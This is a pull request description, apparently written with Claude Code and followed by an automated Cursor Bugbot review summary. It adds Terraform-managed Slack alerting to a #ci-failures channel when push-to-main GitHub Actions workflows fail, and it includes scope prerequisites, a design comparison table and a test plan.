- **New `#ci-failures` Slack channel** managed by `alerts/infra/ci-failures-channel.tf` (via `restapi.slack`, same pattern as the per-project Sentry alert channels). Channel-management bot joins via `conversations.join` for archive-on-destroy semantics.
- **New `.github/workflows/notify-slack-on-main-failure.yml` listener** firing on `workflow_run.completed` for the 5 push-to-main workflows (Alerts Infra, Metrics Bridge, Infra, Aegis App Engine, CI). Filters to `conclusion == 'failure' && head_branch == 'main' && event == 'push'`, then posts a structured Slack message with the workflow name, commit SHA, commit message, triggering actor, and a clickable link to the failed run.
- **Test-fire mechanism** via `workflow_dispatch` (no inputs — checkov disallows them on dispatch). Posts a fixed "🧪 wiring test" message to `#ci-failures` so you can validate the integration end-to-end before relying on it.

## Operator prerequisite (one-time, ~10 seconds)

The bot token `TF_VAR_SLACK_BOT_TOKEN` needs an additional OAuth scope: **`chat:write.public`**. Existing channel-management scopes stay (`channels:read`, `channels:manage`, `channels:join`). Add via Slack admin → Apps → (your app) → OAuth & Permissions → Bot Token Scopes → re-authorize. The token stays valid; scopes attached to it grow.

If the scope is missing, the workflow's `chat.postMessage` call returns `missing_scope` and the workflow's `if [ ".ok" \!= "true" ]` guard surfaces it via `::error::`. **The notifier itself fails loudly if it can't notify — defeating the "silent failure" problem twice over.**

## Why a workflow_run listener over per-workflow notify jobs

| | `workflow_run` listener (this PR) | Per-workflow notify job |
|---|---|---|
| Edits to existing workflows | 0 | All 5 |
| Survives runner death | ✅ (separate run on a separate runner) | ❌ (if runner dies, no notify) |
| Single source of truth | ✅ | ❌ (drift across workflows) |
| Discoverability of the allowlist | Explicit list in this one file | Spread across N files |

The trade-off — `workflow_run` requires enumerating watched workflows by name (no wildcards) — is worth it for the maintainability.

## Test plan

- [ ] Merge this PR. The `alerts-infra.yml` auto-apply provisions the `#ci-failures` channel + bot membership.
- [ ] Add `chat:write.public` to the bot's OAuth scopes (manual Slack admin step).
- [ ] Manually run the workflow from the Actions tab: `Notify Slack on main-branch workflow failure` → "Run workflow". Confirm the 🧪 wiring-test message lands in `#ci-failures`.
- [ ] Verify on the next real workflow failure (or trigger one deliberately via a known-bad commit on a throwaway branch + merge): a structured failure message lands in `#ci-failures` with the workflow name, short SHA, and run URL.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Low Risk**
> Observability and Slack/Terraform channel plumbing only; no production runtime or auth paths change beyond documented Slack bot scope expansion.
> 
> **Overview**
> Adds **Slack alerting when push-to-`main` GitHub Actions runs fail**, so broken deploy/CI on `main` is visible without watching the Actions tab.
> 
> A new **`notify-slack-on-main-failure`** workflow listens via `workflow_run.completed` on a fixed list of workflows (Alerts Infra, Metrics Bridge, Infra, Aegis App Engine, CI, Trunk, Code Health — Duplication). It posts to **`#ci-failures`** for `failure`, `timed_out`, and `startup_failure` on `main` push runs only, with workflow name, short SHA, commit title, actor, and run link. **`workflow_dispatch`** sends a wiring-test message. Payloads are built with **`jq --arg`** (no shell interpolation of commit titles) and commit titles are **mrkdwn-escaped**; the step fails if Slack returns `ok: false`.
> 
> **`alerts/infra/ci-failures-channel.tf`** provisions the public **`#ci-failures`** channel (same `restapi.slack` pattern as other alert channels), has the bot join for archive-on-destroy, and **auto-invites `@eng`** by resolving the usergroup at plan time via new **`hashicorp/http`** data sources, with stable sorted member IDs and invite postconditions that tolerate `already_in_channel`. **`versions.tf`**, lockfile, and **`terraform.tfvars.example`** document expanded bot scopes (`chat:write.public`, `usergroups:read`, invite scopes, etc.).
> 
> **One-time ops:** extend the existing `TF_VAR_SLACK_BOT_TOKEN` app with **`chat:write.public`** (and related scopes for Terraform) in Slack admin before notifications work.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit 548b1ffb0158599434ec0be4e8eaa795b62971c0. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->